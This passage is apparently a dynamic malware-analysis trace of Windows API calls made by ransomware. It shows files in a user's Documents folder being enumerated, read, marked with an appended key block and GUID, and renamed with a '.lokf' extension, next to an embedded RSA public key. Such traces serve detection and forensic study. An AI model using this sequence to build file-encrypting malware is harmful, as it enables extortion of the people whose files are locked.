returned 1 [0058.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.809] GetCurrentThreadId () returned 0x9e0 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7cc38 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.810] GetCurrentThreadId () returned 0x9e0 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x32619a0 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b190 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1a8 [0058.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.811] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xcaaf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.811] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.811] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.811] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.811] CloseHandle (hObject=0x5cc) returned 1 [0058.812] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\44yienfP0_mk.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\44yienfp0_mk.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\44yienfP0_mk.docx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\44yienfp0_mk.docx.lokf")) returned 1 [0058.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.813] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.814] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1145690, ftCreationTime.dwHighDateTime=0x1d57765, ftLastAccessTime.dwLowDateTime=0xfd31b9f0, ftLastAccessTime.dwHighDateTime=0x1d58e75, ftLastWriteTime.dwLowDateTime=0xfd31b9f0, ftLastWriteTime.dwHighDateTime=0x1d58e75, nFileSizeHigh=0x0, nFileSizeLow=0xef8f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4QdlKGracmIsfBv8Rj5U.xlsx", cAlternateFileName="4QDLKG~1.XLS")) returned 1 [0058.814] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4QdlKGracmIsfBv8Rj5U.xlsx") returned=".xlsx" [0058.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4QdlKGracmIsfBv8Rj5U.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4qdlkgracmisfbv8rj5u.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.814] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=61327) returned 1 [0058.814] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.816] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xef69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.816] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.817] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xef8f, lpOverlapped=0x0) returned 1 [0058.817] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.817] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.817] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.817] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.818] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.818] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.818] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.818] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.818] GetLastError () returned 0x0 [0058.818] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.818] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.819] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.819] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.819] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.819] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1a8 | out: hHeap=0x660000) returned 1 [0058.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1c0 | out: hHeap=0x660000) returned 1 [0058.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1c0 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b1a8 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1c0 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1a8 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.820] GetCurrentThreadId () returned 0x9e0 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7ccc8 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.820] GetCurrentThreadId () returned 0x9e0 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x32619a0 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1a8 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1c0 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b190 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1d8 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.822] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xef8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.822] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.822] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.822] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.822] CloseHandle (hObject=0x5cc) returned 1 [0058.823] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0058.823] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.823] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4QdlKGracmIsfBv8Rj5U.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4qdlkgracmisfbv8rj5u.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4QdlKGracmIsfBv8Rj5U.xlsx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4qdlkgracmisfbv8rj5u.xlsx.lokf")) returned 1 [0058.824] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf11920f0, ftCreationTime.dwHighDateTime=0x1d52a6f, ftLastAccessTime.dwLowDateTime=0xc46c52d0, ftLastAccessTime.dwHighDateTime=0x1d5104c, ftLastWriteTime.dwLowDateTime=0xc46c52d0, ftLastWriteTime.dwHighDateTime=0x1d5104c, nFileSizeHigh=0x0, nFileSizeLow=0xde55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aam-uk.xlsx", cAlternateFileName="AAM-UK~1.XLS")) returned 1 [0058.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.825] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aam-uk.xlsx") returned=".xlsx" [0058.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aam-uk.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aam-uk.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.825] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=56917) returned 1 [0058.825] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.827] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xde2f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.827] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.828] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.828] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xde55, lpOverlapped=0x0) returned 1 [0058.828] lstrlenA (lpString="-----BEGIN PUBLIC 